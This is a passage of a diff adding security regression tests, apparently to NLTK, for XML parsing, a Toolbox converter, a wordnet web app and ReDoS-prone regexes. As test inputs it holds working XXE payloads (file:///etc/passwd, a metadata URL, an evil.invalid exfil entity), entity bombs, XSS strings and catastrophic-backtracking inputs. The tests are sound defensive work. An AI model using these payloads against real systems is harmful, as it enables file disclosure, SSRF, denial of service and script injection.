+    """A classic nested ``lol1..lolN`` billion-laughs document."""
+    decls = "".join(
+        f'<!ENTITY lol{i} "{f"&lol{i - 1};" * 10}">' for i in range(1, levels + 1)
+    )
+    return (
+        '<?xml version="1.0"?>'
+        f'<!DOCTYPE lolz [<!ENTITY lol0 "{seed}">{decls}]>'
+        f"<lolz>&lol{levels};</lolz>"
+    )
+
+
+def _quadratic(entity_size=20000, refs=100):
+    """A quadratic-blowup payload: one big entity referenced many times."""
+    return (
+        '<?xml version="1.0"?>'
+        f'<!DOCTYPE d [<!ENTITY a "{"A" * entity_size}">]>'
+        f"<d>{'&a;' * refs}</d>"
+    )
+
+
+def _wide_deep(width=50):
+    """A bomb that is both wide and deep: many entities each fanning out."""
+    wide = "".join(
+        f'<!ENTITY w{i} "&base;&base;&base;&base;&base;">' for i in range(width)
+    )
+    refs = "".join(f"&w{i};" for i in range(width))
+    return (
+        '<?xml version="1.0"?>'
+        f'<!DOCTYPE d [<!ENTITY base "AAAAAAAAAA">{wide}]>'
+        f"<d>{refs}</d>"
+    )
+
+
+def _flat_entity():
+    """A FLAT entity: stock ElementTree expands it, so it makes a clean teeth
+    demo that stays well under libexpat's amplification threshold."""
+    return (
+        '<?xml version="1.0"?>'
+        f'<!DOCTYPE d [<!ENTITY a "{"A" * 5000}">]>'
+        f"<d>{'&a;' * 50}</d>"
+    )
+
+
+# Every one of these DECLARES or REFERENCES an entity and must be refused.
+XXE_REJECTED = {
+    "xxe-file-system": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>'
+    ),
+    "xxe-http-external": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest">]>'
+        "<r>&xxe;</r>"
+    ),
+    "xxe-php-filter": (
+        '<?xml version="1.0"?>'
+        "<!DOCTYPE r [<!ENTITY xxe SYSTEM "
+        '"php://filter/convert.base64-encode/resource=/etc/passwd">]><r>&xxe;</r>'
+    ),
+    "xxe-expect": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r [<!ENTITY xxe SYSTEM "expect://id">]><r>&xxe;</r>'
+    ),
+    "parameter-entity": ('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % pe "x">]><r/>'),
+    "parameter-entity-external": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r [<!ENTITY % pe SYSTEM "file:///etc/passwd">%pe;]><r/>'
+    ),
+    "recursive-entity": (
+        '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY a "&a;">]><r>&a;</r>'
+    ),
+    "oob-parameter-exfil": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r [<!ENTITY % remote SYSTEM "http://evil.invalid/">%remote;]><r/>'
+    ),
+    "external-general-entity-decl": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r [<!ENTITY ext SYSTEM "http://evil.invalid/x">]><r>hi</r>'
+    ),
+}
+
+EXPANSION_REJECTED = {
+    "billion-laughs-9": _billion_laughs(levels=9),
+    "quadratic-blowup": _quadratic(),
+    "wide-and-deep": _wide_deep(),
+}
+
+# These merely NAME an external DTD; ElementTree never fetches it, so they PARSE
+# but must issue no outbound request. They are checked against a live socket.
+EXTERNAL_DTD_NO_FETCH = {
+    "external-dtd-system": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r SYSTEM "http://{host}:{port}/x.dtd"><r>x</r>'
+    ),
+    "external-dtd-public": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r PUBLIC "-//X//DTD Made Up//EN" '
+        '"http://{host}:{port}/x.dtd"><r>x</r>'
+    ),
+}
+
+# These reference an external resource and must be refused before any fetch; the
+# same socket check proves the refusal happens with zero outbound requests.
+EXTERNAL_REF_NO_FETCH = {
+    "oob-parameter": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r [<!ENTITY % rem SYSTEM "http://{host}:{port}/">%rem;]><r/>'
+    ),
+    "external-general-entity": (
+        '<?xml version="1.0"?>'
+        '<!DOCTYPE r [<!ENTITY x SYSTEM "http://{host}:{port}/">]><r>&x;</r>'
+    ),
+}
+
+# Benign controls that must keep parsing.
+BENIGN_XML = {
+    "nested-tree": "<corpus><doc id='1'><w pos='NN'>cat</w></doc></corpus>",
+    "builtin-escapes": "<d><w>a &amp; b &lt; c &gt; d</w></d>",
+    "external-subset-named": '<!DOCTYPE d SYSTEM "apf.dtd"><d><w>Bob</w></d>',
+    "public-id-named": ('<!DOCTYPE d PUBLIC "-//X//DTD//EN" "x.dtd"><d><w>Bob</w></d>'),
+    "cdata-entity-text": '<d><w><![CDATA[<!ENTITY a "x">]]></w></d>',
+}
+
+
+# ===========================================================================
+# Back-end fixture: force defusedxml present, then force the fallback
+# ===========================================================================
+
+
+@pytest.fixture(params=["defusedxml", "fallback"])
+def backend(request, monkeypatch):
+    """``nltk.xmlsec`` with each back end forced, restored on teardown.
+
+    The fallback path is the standard-library pre-scan used when ``defusedxml``
+    is not installed; forcing it here exercises that guard even on a machine
+    where ``defusedxml`` is present.
+    """
+    if request.param == "defusedxml":
+        pytest.importorskip("defusedxml")
+        module = importlib.reload(xmlsec)
+        assert module.HAVE_DEFUSEDXML
+    else:
+        # Hiding the module makes ``import defusedxml`` raise ImportError, so the
+        # reload selects the standard-library pre-scan path.
+        monkeypatch.setitem(sys.modules, "defusedxml", None)
+        module = importlib.reload(xmlsec)
+        assert not module.HAVE_DEFUSEDXML
+    yield module
+    # Undo the patch before reloading so the module is left on its real back end.
+    monkeypatch.undo()
+    importlib.reload(xmlsec)
+
+
+def _raises_guard(func, *args):
+    """Assert ``func(*args)`` raises the entity guard, not something incidental."""
+    with pytest.raises((ValueError, ParseError)) as excinfo:
+        func(*args)
+    name = type(excinfo.value).__name__
+    assert "Forbidden" in name or "Entit" in str(excinfo.value) or name == "ParseError"
+    return excinfo.value
+
+
+# ===========================================================================
+# 1. XXE: external entities, parameter entities, recursion, OOB exfil
+# ===========================================================================
+
+
+@pytest.mark.parametrize("payload", list(XXE_REJECTED.values()), ids=list(XXE_REJECTED))
+def test_xxe_declarations_are_refused(backend, payload):
+    """Every XXE flavour is refused by both ``fromstring`` and ``parse``."""
+    _raises_guard(backend.fromstring, payload)
+    _raises_guard(backend.parse, io.StringIO(payload))
+
+
+def test_file_entity_does_not_disclose_a_real_sentinel(backend, tmp_path):
+    """An external file entity pointed at a real on-disk file must not read it.
+
+    The file exists and holds a unique canary; the parse must raise before the
+    canary can appear anywhere. ``file:///etc/passwd`` is bait only elsewhere;
+    here a real file removes any doubt about whether disclosure was possible.
+    """
+    secret = tmp_path / "secret.txt"
+    secret.write_text(SENTINEL, encoding="utf-8")
+    uri = secret.as_uri()
+    payload = (
+        '<?xml version="1.0"?>'
+        f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "{uri}">]><r>&xxe;</r>'
+    )
+    error = _raises_guard(backend.fromstring, payload)
+    assert SENTINEL not in str(error)
+
+
+# ===========================================================================
+# 2. Billion-laughs / entity-expansion, with teeth against stock ElementTree
+# ===========================================================================
+
+
+@pytest.mark.parametrize(
+    "payload", list(EXPANSION_REJECTED.values()), ids=list(EXPANSION_REJECTED)
+)
+def test_entity_expansion_is_refused(backend, payload):
+    """Nested, quadratic and wide-and-deep bombs are all refused outright."""
+    _raises_guard(backend.fromstring, payload)
+    _raises_guard(backend.parse, io.StringIO(payload))
+
+
+def test_teeth_flat_entity_expands_under_stock_elementtree():
+    """Teeth: the payload NLTK refuses really does expand under stock parsing.
+
+    A flat entity is expanded by ``xml.etree.ElementTree`` (it stays under
+    libexpat's amplification threshold), so a guard that stopped working would
+    let the same document balloon in memory.
+    """
+    payload = _flat_entity()
+    stock = StockET.fromstring(payload)
+    assert len(stock.text) == 5000 * 50  # stock expands it
+    _raises_guard(xmlsec.fromstring, payload)  # xmlsec refuses the same bytes
+
+
+def test_teeth_nested_bomb_expands_under_stock_elementtree():
+    """A modest nested bomb expands under stock ElementTree but is refused here."""
+    payload = _billion_laughs(levels=3, seed="AAAAAAAAAA")
+    stock = StockET.fromstring(payload)
+    assert len(stock.text) == 10 * 10**3  # 10-char seed, three x10 levels
+    _raises_guard(xmlsec.fromstring, payload)
+
+
+def test_utf16_encoded_bomb_is_screened(backend):
+    """A non-ASCII encoding must not smuggle a declaration past the pre-scan."""
+    payload = _billion_laughs(levels=6).encode("utf-16")
+    _raises_guard(backend.parse, io.BytesIO(payload))
+
+
+# ===========================================================================
+# 3. External DTD / SSRF: a real socket must receive ZERO connections
+# ===========================================================================
+
+
+class _Listener:
+    """A one-shot loopback listener that records any bytes it receives."""
+
+    def __init__(self):
+        self.sock = socket.socket()
+        self.sock.bind(("127.0.0.1", 0))
+        self.sock.listen(1)
+        self.sock.settimeout(3)
+        self.host, self.port = self.sock.getsockname()
+        self.connections = []
+        self._thread = threading.Thread(target=self._accept, daemon=True)
+        self._thread.start()
+
+    def _accept(self):
+        try:
+            connection, _ = self.sock.accept()
+            self.connections.append(connection.recv(64))
+            connection.close()
+        except OSError:
+            pass
+
+    def close(self):
+        self._thread.join(timeout=3)
+        self.sock.close()
+
+
+@pytest.mark.parametrize(
+    "template", list(EXTERNAL_DTD_NO_FETCH.values()), ids=list(EXTERNAL_DTD_NO_FETCH)
+)
+def test_external_dtd_named_but_never_fetched(backend, template):
+    """A DOCTYPE naming an external DTD parses, but no request must go out."""
+    listener = _Listener()
+    payload = template.format(host=listener.host, port=listener.port)
+    try:
+        backend.fromstring(payload)  # naming an external subset is allowed
+    except (ValueError, ParseError):
+        pass
+    finally:
+        listener.close()
+    assert listener.connections == [], "the parser fetched the external DTD (SSRF)"
+
+
+@pytest.mark.parametrize(
+    "template", list(EXTERNAL_REF_NO_FETCH.values()), ids=list(EXTERNAL_REF_NO_FETCH)
+)
+def test_external_reference_refused_with_zero_connections(backend, template):
+    """An external entity / parameter entity is refused AND never fetched."""
+    listener = _Listener()
+    payload = template.format(host=listener.host, port=listener.port)
+    try:
+        _raises_guard(backend.fromstring, payload)
+    finally:
+        listener.close()
+    assert listener.connections == [], "refusal still leaked an outbound request"
+
+
+# ===========================================================================
+# 4. Benign controls: ordinary XML must keep round-tripping
+# ===========================================================================
+
+
+@pytest.mark.parametrize("payload", list(BENIGN_XML.values()), ids=list(BENIGN_XML))
+def test_benign_xml_still_parses(backend, payload):
+    root = backend.fromstring(payload)
+    assert root.iter("w") is not None
+    assert backend.parse(io.StringIO(payload)).getroot() is not None
+
+
+def test_benign_nested_tree_has_the_right_shape(backend):
+    """A normal document parses to the expected element tree, attributes intact."""
+    root = backend.fromstring(
+        "<corpus><doc id='1'><w pos='NN'>cat</w><w pos='NN'>dog</w></doc></corpus>"
+    )
+    words = root.findall("./doc/w")
+    assert [w.text for w in words] == ["cat", "dog"]
+    assert [w.attrib["pos"] for w in words] == ["NN", "NN"]
+    assert root.find("./doc").attrib["id"] == "1"
+
+
+# ===========================================================================
+# 5. Toolbox standard-format-marker sanitization (issue #3800)
+# ===========================================================================
+
+
+def _parse_toolbox(sfm):
+    """Parse a standard-format-marker string to serialized XML."""
+    from xml.etree.ElementTree import tostring
+
+    from nltk.toolbox import ToolboxData
+
+    data = ToolboxData()
+    data.open_string(sfm)
+    return tostring(data.parse(), encoding="unicode")
+
+
+def test_toolbox_injected_markers_are_neutralized():
+    """A hostile ``\\marker`` name must never become a live tag in the tree.
+
+    The marker token is what names an XML element; an injected ``<script>`` or
+    ``<!ENTITY`` or dangerous element name in that position must be sanitized to
+    an inert element name, not emitted verbatim.
+    """
+    sfm = (
+        "\\_sh v3.0 400 Test\n"
+        "\\lx kaa\n"
+        "\\<!ENTITY smuggled\n"
+        "\\x><script> payload\n"
+        "\\iframe hostile\n"
+        "\\style body{}\n"
+    )
+    xml = _parse_toolbox(sfm)
+
+    # No hostile markup survives as a live tag.
+    assert "<script>" not in xml
+    assert "<!ENTITY" not in xml
+    assert "<iframe>" not in xml
+    assert "<style>" not in xml
+    # Dangerous element names are namespaced away with the safe prefix.
+    assert "<tb_iframe>" in xml
+    assert "<tb_style>" in xml
+    # The angle brackets and bang in an injected marker are replaced, not kept.
+    assert "<x__script_>" in xml
+    assert "<__ENTITY>" in xml
+    # The benign content is still there.
+    assert "kaa" in xml
+
+
+def test_toolbox_marker_cannot_start_with_digit_or_control_char():
+    """Markers starting with a digit, and control chars anywhere, are sanitized."""
+    sfm = "\\_sh header\n\\lx word\n\\123bad value\n\\lx\x00ctrl trailing\n"
+    xml = _parse_toolbox(sfm)
+    assert "<123bad>" not in xml  # XML names cannot start with a digit
+    assert "<_123bad>" in xml
+    assert "\x00" not in xml  # the control char is gone
+
+
+def test_toolbox_field_value_is_escaped_not_injected():
+    """Markup in a field VALUE is XML-escaped text, never parsed as structure."""
+    sfm = "\\_sh header\n\\lx <script>alert(1)</script>\n"
+    xml = _parse_toolbox(sfm)
+    assert "<script>" not in xml  # not a live tag
+    assert "&lt;script&gt;alert(1)&lt;/script&gt;" in xml  # inert escaped text
+
+
+def test_toolbox_benign_record_round_trips():
+    """A perfectly ordinary Toolbox record still parses to the expected tree."""
+    from nltk.toolbox import ToolboxData
+
+    sfm = "\\_sh v3.0 400 Rotokas\n\\lx kaa\n\\ps V.A\n\\ge gag\n"
+    data = ToolboxData()
+    data.open_string(sfm)
+    tree = data.parse()
+    record = tree.find("record")
+    assert record.find("lx").text == "kaa"
+    assert record.find("ps").text == "V.A"
+    assert record.find("ge").text == "gag"
+
+
+# ===========================================================================
+# 6. wordnet browser app: reflected-query XSS escaping (GHSA-gfwx-w7gr-fvh7)
+# ===========================================================================
+
+
+def _wordnet_available():
+    from nltk.data import find
+
+    try:
+        find("corpora/wordnet.zip")
+        return True
+    except LookupError:
+        return False
+
+
+requires_wordnet = pytest.mark.skipif(
+    not _wordnet_available(), reason="wordnet corpus not installed"
+)
+
+XSS_PAYLOADS = {
+    "script-tag": "<script>alert(1)</script>",
+    "img-onerror": '"><img onerror>',
+    "svg-onload": "'><svg/onload=alert(1)>",
+    "javascript-uri": "javascript:alert(1)",
+    "entity-encoded-script": "&lt;script&gt;alert(1)&lt;/script&gt;",
+}
+
+
+@requires_wordnet
+@pytest.mark.parametrize("payload", list(XSS_PAYLOADS.values()), ids=list(XSS_PAYLOADS))
+def test_wordnet_page_from_word_escapes_hostile_query(payload):
+    """The reflected word must be HTML-escaped, with no live tag or js sink."""
+    from nltk.app.wordnet_app import page_from_word
+
+    body, _ = page_from_word(payload)
+    lowered = body.lower()
+    # No live executable markup breaks out of the text context.
+    assert "<script" not in lowered
+    assert "<img" not in lowered
+    assert "<svg" not in lowered
+    # No javascript: URI lands inside an attribute sink.
+    assert 'href="javascript:' not in lowered
+    assert 'src="javascript:' not in lowered
+    # The payload is present only in its html.escape form.
+    assert html.escape(payload) in body
+
+
+@requires_wordnet
+@pytest.mark.parametrize(
+    "payload",
+    ["<script>alert(1)</script>", '"><img onerror>', "javascript:alert(1)"],
+    ids=["script", "img", "javascript-uri"],
+)
+def test_wordnet_search_route_escapes_reflected_query(payload):
+    """Drive the real ``search`` route in-process; the reflection must be safe.
+
+    The ``&`` and ``=`` delimiters are excluded from these payloads so they
+    survive the handler's own query splitting and reach the escaping sink.
+    """
+    import nltk.app.wordnet_app as wa
+
+    handler = wa.MyServerHandler.__new__(wa.MyServerHandler)
+    handler.wfile = io.BytesIO()
+    handler.path = "/search?nextWord=" + payload
+    handler.send_response = lambda *a, **k: None
+    handler.send_header = lambda *a, **k: None
+    handler.end_headers = lambda: None
+    handler.do_GET()
+    out = handler.wfile.getvalue().decode("utf-8", "replace").lower()
+    assert "<script>alert" not in out
+    assert "<img onerror" not in out
+    assert 'href="javascript:' not in out
+
+
+@requires_wordnet
+def test_wordnet_benign_query_renders_safe_text():
+    """A benign query renders normally and reflects its (harmless) word."""
+    from nltk.app.wordnet_app import page_from_word
+
+    body, word = page_from_word("dog")
+    assert word == "dog"
+    assert "<script" not in body.lower()
+    assert body  # a real page was produced
+
+
+# ===========================================================================
+# 7. bcp47 corpus reader: entity-expansion in the CLDR XML must be refused
+# ===========================================================================
+
+_IANA_REGISTRY = (
+    "File-Date: 2024-01-01\n%%\nType: language\nSubtag: en\nDescription: English\n"
+)
+
+_CLDR_BOMB = (
+    '<?xml version="1.0"?>'
+    "<!DOCTYPE ldml ["
+    '<!ENTITY a0 "AAAAAAAAAA">'
+    '<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">'
+    '<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">'
+    "]>"
+    "<ldml><localeDisplayNames><subdivisions>"
+    '<subdivision type="x">&a2;</subdivision>'
+    "</subdivisions></localeDisplayNames></ldml>"
+)
+
+_CLDR_BENIGN = (
+    '<?xml version="1.0"?>'
+    "<ldml><localeDisplayNames><subdivisions>"
+    '<subdivision type="fr64">Pyrenees</subdivision>'
+    "</subdivisions></localeDisplayNames></ldml>"
+)
+
+
+def _build_bcp47_corpus(tmp_path, cldr_xml):
+    import nltk.data
+
+    (tmp_path / "iana").mkdir()
+    (tmp_path / "cldr").mkdir()
+    (tmp_path / "iana" / "language-subtag-registry.txt").write_text(
+        _IANA_REGISTRY, encoding="utf-8"
+    )
+    (tmp_path / "cldr" / "common-subdivisions-en.xml").write_text(
+        cldr_xml, encoding="utf-8"
+    )
+    root = str(tmp_path)
+    if root not in nltk.data.path:
+        nltk.data.path.append(root)
+    return root
+
+
+def test_bcp47_reader_refuses_entity_bomb(tmp_path):
+    """A billion-laughs bomb in the CLDR subdivisions file must be refused."""
+    import nltk.data
+    from nltk.corpus.reader.bcp47 import BCP47CorpusReader
+
+    root = _build_bcp47_corpus(tmp_path, _CLDR_BOMB)
+    try:
+        with pytest.raises((ValueError, ParseError)) as excinfo:
+            BCP47CorpusReader(root, [r".*"])
+        name = type(excinfo.value).__name__
+        assert "Forbidden" in name or "Entit" in str(excinfo.value)
+    finally:
+        if root in nltk.data.path:
+            nltk.data.path.remove(root)
+
+
+def test_bcp47_reader_parses_benign_cldr(tmp_path):
+    """A well-formed CLDR subdivisions file still loads into the reader."""
+    import nltk.data
+    from nltk.corpus.reader.bcp47 import BCP47CorpusReader
+
+    root = _build_bcp47_corpus(tmp_path, _CLDR_BENIGN)
+    try:
+        reader = BCP47CorpusReader(root, [r".*"])
+        assert reader.subdiv["fr64"] == "Pyrenees"
+    finally:
+        if root in nltk.data.path:
+            nltk.data.path.remove(root)
+
+
+# ===========================================================================
+# 8. MTE corpus reader: entity refusal + per-view tag-filter isolation
+# ===========================================================================
+
+_MTE_HEADER = '<?xml version="1.0" encoding="UTF-8"?>\n'
+
+_MTE_BOMB = (
+    _MTE_HEADER + "<!DOCTYPE TEI ["
+    '<!ENTITY a0 "AAAAAAAAAA">'
+    '<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">'
+    '<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">'
+    "]>\n"
+    '<TEI xmlns="https://www.tei-c.org/ns/1.0"><text><body><div><div><p><s>'
+    '<w ana="Ncmsn" lemma="x">&a2;</w>'
+    "</s></p></div></div></body></text></TEI>"
+)
+
+_MTE_MIXED = (
+    _MTE_HEADER
+    + '<TEI xmlns="https://www.tei-c.org/ns/1.0"><text><body><div><div><p><s>'
+    '<w ana="Ncmsn" lemma="secret">NOUN1</w>'
+    '<w ana="Vmip3s" lemma="public">VERB1</w>'
+    '<w ana="Ncmsn" lemma="s2">NOUN2</w>'
+    '<w ana="Vmip3s" lemma="p2">VERB2</w>'
+    "</s></p></div></div></body></text></TEI>"
+)
+
+
+def _mte_reader(tmp_path, name, xml):
+    import nltk.data
+    from nltk.corpus.reader.mte import MTECorpusReader
+
+    (tmp_path / name).write_text(xml, encoding="utf-8")
+    root = str(tmp_path)
+    if root not in nltk.data.path:
+        nltk.data.path.append(root)
+    return MTECorpusReader(root, [name]), root
+
+
+def test_mte_reader_refuses_entity_bomb(tmp_path):
+    """An entity bomb in an MTE TEI file must not expand.
+
+    The lazy view parses element blocks with the defused parser, so the bomb is
+    either refused or its entity reference is left undefined. Either way it never
+    balloons in memory.
+    """
+    import nltk.data
+
+    reader, root = _mte_reader(tmp_path, "bomb.xml", _MTE_BOMB)
+    try:
+        with pytest.raises((ValueError, ParseError)):
+            list(reader.tagged_words(tags="N"))
+    finally:
+        if root in nltk.data.path:
+            nltk.data.path.remove(root)
+
+
+def test_mte_tag_filters_isolated_across_interleaved_views(tmp_path):
+    """Three lazy views with different filters must not corrupt one another.
+
+    Each ``tagged_words`` call builds its own reader with private ``_tags`` /
+    ``_tagset`` state; consuming the views interleaved (one element from each,
+    round robin) must not let one view's filter bleed into another.
+    """
+    import nltk.data
+
+    reader, root = _mte_reader(tmp_path, "mixed.xml", _MTE_MIXED)
+    try:
+        nouns = iter(reader.tagged_words(tags="N"))
+        verbs = iter(reader.tagged_words(tags="V"))
+        every = iter(reader.tagged_words(tags=""))
+
+        assert next(nouns) == ("NOUN1", "Ncmsn")
+        assert next(verbs) == ("VERB1", "Vmip3s")
+        assert next(every) == ("NOUN1", "Ncmsn")
+        assert next(nouns) == ("NOUN2", "Ncmsn")
+        assert next(verbs) == ("VERB2", "Vmip3s")
+
+        # Fresh full passes confirm each filter kept its own identity.
+        assert list(reader.tagged_words(tags="N")) == [
+            ("NOUN1", "Ncmsn"),
+            ("NOUN2", "Ncmsn"),
+        ]
+        assert list(reader.tagged_words(tags="V")) == [
+            ("VERB1", "Vmip3s"),
+            ("VERB2", "Vmip3s"),
+        ]
+    finally:
+        if root in nltk.data.path:
+            nltk.data.path.remove(root)

--- a/nltk/test/unit/test_pathsec.py
+++ b/nltk/test/unit/test_pathsec.py
@@ -590,6 +590,10 @@ def test_proxied_fetch_refused_for_every_target_even_with_no_proxy_present(
     monkeypatch.setattr(urllib.request, "_opener", None)
     monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
     monkeypatch.setattr(pathsec, "_numeric_ipv4", lambda h: None)
+    # Neuter the address classifier too, so an IP-literal target is not refused
+    # by the resolver-independent literal check before the proxy guard (the
+    # subject of this test) gets to fail closed.
+    monkeypatch.setattr(pathsec, "_ip_is_forbidden", lambda ip: False)
     monkeypatch.setattr(pathsec, "ENFORCE", True)
     monkeypatch.setattr(pathsec, "ALLOW_PROXIED_FETCH", False)
 

--- a/nltk/test/unit/test_quadratic_dos.py
+++ b/nltk/test/unit/test_quadratic_dos.py
@@ -182,11 +182,19 @@ class TestReadSexprBlockQuadratic:
             "(a b)"
         ]
 
-    def test_unclosed_sexpr_is_subquadratic(self):
+    def test_unclosed_sexpr_is_subquadratic(self, monkeypatch):
         # Pre-patch: an oversized single s-expression is re-parsed from position
         # 0 on every fixed-size grow -> O(n^2). Exponential read growth makes it
         # O(n). A ratio test is robust to the (high) linear constant: 4x input
         # should cost ~4x (linear), not ~16x (quadratic).
+        #
+        # Raise the redos wall-clock bound far above the linear cost so a loaded
+        # host cannot trip it on the (legitimate) big linear parse and turn this
+        # scaling test into a spurious TimeoutError. A quadratic regression still
+        # fails: it either blows the ratio or blows this larger bound.
+        import nltk.redos as redos_mod
+
+        monkeypatch.setattr(redos_mod, "DEFAULT_TIMEOUT", 30)
         t1 = _elapsed(lambda: read_sexpr_block(io.StringIO("(" * 200_000)))
         t4 = _elapsed(lambda: read_sexpr_block(io.StringIO("(" * 800_000)))
         assert t4 < 10 * t1 + 0.5

--- a/nltk/test/unit/test_quadratic_dos.py
+++ b/nltk/test/unit/test_quadratic_dos.py
@@ -1,4 +1,4 @@
-"""
+r"""
 Living-audit regression tests for the algorithmic-complexity DoS cluster
 (GHSA-ww6m-cw3f-q94g umbrella -- PorterStemmer; siblings GHSA-vp2x-qp44-57v7
 XMLCorpusView, GHSA-8mpw-7fpc-4gqj TEICorpusView, and the newly-found
@@ -44,6 +44,17 @@ Three groups:
    "mark interior y/i/u as a consonant" step rebuilt the whole string on each
    match inside a per-position loop = O(n^2) on a crafted token; now an in-place
    list mutation joined once (byte-for-byte identical output).
+
+7. The greedy-token-over-data ReDoS batch: a constant pattern with a greedy
+   leading token (\w+, \s*, [^"]+) and an optionally-absent suffix, applied with
+   findall/sub/split over attacker data, is O(n^2). ``destructive.py`` (the
+   default word_tokenize final-period rule -- a space inside the class abuts
+   \s*$), ``reviews.py`` FEATURES (the {0,50} bound missed a spaceless run),
+   ``lin.py`` _key_re, ``bracket_parse.py`` ALPINO_ATTR (residual after
+   ALPINO_NODE was hardened), ``senseval.py`` lone-& sub, and ``sem/evaluate.py``
+   _VAL_SPLIT_RE + siblings (residual after CVE-2026-12890). All routed through
+   redos.compile; the regex engine linearizes four, destructive/lin are bounded
+   by the wall-clock timeout.
 
 Tests assert (a) correctness is preserved and (b) a crafted input is bounded --
 either linear (ratio/wall-clock) or rejected by an explicit length guard. The
@@ -710,6 +721,111 @@ class TestSnowballUpcaseQuadratic:  # snowball.py y/i/u "mark-as-consonant" rebu
         for lang in ("spanish", "portuguese"):
             st = SnowballStemmer(lang).stem
             assert _elapsed(lambda: st("aei" * 40000)) < 2.0
+
+
+# ==========================================================================
+# GREEDY-TOKEN-OVER-DATA ReDoS (fixed): constant pattern, attacker data
+# ==========================================================================
+# Shape: a greedy leading token (\w+, \s*, [^"]+) plus a required suffix that may
+# be absent, applied with findall/sub/split over attacker-controlled corpus/text
+# data (which retries at every start position) -> O(n^2). Routed through
+# redos.compile: four are linearized by the regex engine, one (lin) still
+# backtracks and is bounded by the wall-clock TimeoutError.
+
+
+class TestNLTKWordTokenizerFinalPeriodDoS:  # destructive.py PUNCTUATION[0]
+    def test_benign_tokenize_unchanged(self):
+        from nltk.tokenize import NLTKWordTokenizer
+
+        s = (
+            "Good muffins cost $3.88 (roughly 3,36 euros)\n"
+            "in New York.  Please buy me\ntwo of them.\nThanks."
+        )
+        assert NLTKWordTokenizer().tokenize(s) == [
+            "Good", "muffins", "cost", "$", "3.88", "(", "roughly", "3,36",
+            "euros", ")", "in", "New", "York.", "Please", "buy", "me", "two",
+            "of", "them.", "Thanks", ".",
+        ]  # fmt: skip
+
+    def test_final_period_space_run_is_bounded(self, monkeypatch):
+        # The class ends with a space directly before \s*$, so [..space..]* and
+        # \s* both match the trailing space run and backtrack O(n^2) when the
+        # text ends in a non-space, non-class char (~32 KB -> 8s). The regex
+        # engine is also quadratic here, so only the timeout bounds it.
+        import nltk.redos as redos_mod
+
+        monkeypatch.setattr(redos_mod, "DEFAULT_TIMEOUT", 0.5)
+        from nltk.tokenize import NLTKWordTokenizer
+
+        with pytest.raises(TimeoutError):
+            NLTKWordTokenizer().tokenize("a." + " " * 80000 + "!")
+
+    def test_treebank_no_space_class_stays_linear(self):  # BENIGN guard
+        # Treebank's twin rule has no space in the class -> disjoint quantifiers.
+        from nltk.tokenize import TreebankWordTokenizer
+
+        assert (
+            _elapsed(lambda: TreebankWordTokenizer().tokenize("a." + " " * 80000 + "!"))
+            < 2.0
+        )
+
+
+class TestReviewsFeaturesQuadratic:  # reviews.py FEATURES
+    def test_benign_features_unchanged(self):
+        from nltk.corpus.reader.reviews import FEATURES
+
+        assert FEATURES.findall("great camera[+3] but heavy[-2]") == [
+            ("great camera", "+3"),
+            ("but heavy", "-2"),
+        ]
+
+    def test_spaceless_run_is_linear(self):
+        # The {0,50} bound only stopped the space-separated attack; a spaceless
+        # bracket-less run stayed O(n^2) via the leading \w+ retried per position.
+        import io
+
+        from nltk.corpus.reader.reviews import ReviewsCorpusReader
+
+        rr = ReviewsCorpusReader.__new__(ReviewsCorpusReader)
+        assert (
+            _elapsed(lambda: rr._read_features(io.StringIO("a" * 200000 + "\n"))) < 5.0
+        )
+
+
+class TestLinThesaurusKeyQuadratic:  # lin.py _key_re: engine still backtracks
+    def test_key_line_is_bounded(self, monkeypatch):
+        import nltk.redos as redos_mod
+
+        monkeypatch.setattr(redos_mod, "DEFAULT_TIMEOUT", 0.5)
+        from nltk.corpus.reader.lin import LinThesaurusCorpusReader
+
+        with pytest.raises(TimeoutError):
+            LinThesaurusCorpusReader._key_re.sub(r"\1", "(" * 200000)
+
+
+class TestAlpinoAttrQuadratic:  # bracket_parse.py ALPINO_ATTR
+    def test_long_node_body_is_linear(self):
+        import nltk.corpus.reader.bracket_parse as bp
+
+        r = bp.AlpinoCorpusReader.__new__(bp.AlpinoCorpusReader)
+        doc = '<alpino_ds version="1.3">\n<node ' + "a" * 200000 + ">\n</alpino_ds>\n"
+        assert _elapsed(lambda: bp.AlpinoCorpusReader._normalize(r, doc)) < 5.0
+
+
+class TestSensevalFixXMLQuadratic:  # senseval.py lone-& sub
+    def test_lone_amp_whitespace_run_is_linear(self):
+        from nltk.corpus.reader.senseval import _fixXML
+
+        assert _elapsed(lambda: _fixXML(" " * 200000)) < 5.0
+        assert _fixXML("a & b") == "a &amp; b"  # correctness preserved
+
+
+class TestEvaluateValSplitQuadratic:  # sem/evaluate.py _VAL_SPLIT_RE + siblings
+    def test_internal_whitespace_run_is_linear(self):
+        from nltk.sem.evaluate import read_valuation
+
+        assert _elapsed(lambda: read_valuation("a => {" + " " * 200000 + "}")) < 5.0
+        assert dict(read_valuation("boy => b1")) == {"boy": "b1"}  # correctness
 
 
 # ==========================================================================

--- a/nltk/test/unit/test_redos_caller_patterns.py
+++ b/nltk/test/unit/test_redos_caller_patterns.py
@@ -26,7 +26,12 @@ import pytest
 
 _EVIL = r"(a+)+$"
 _BAIT = "a" * 34 + "!"
-_LIMIT = 20
+# Hang-detection ceiling for the subprocess, NOT the ReDoS bound (that is
+# redos's own wall-clock limit, a few seconds, applied inside the child). A
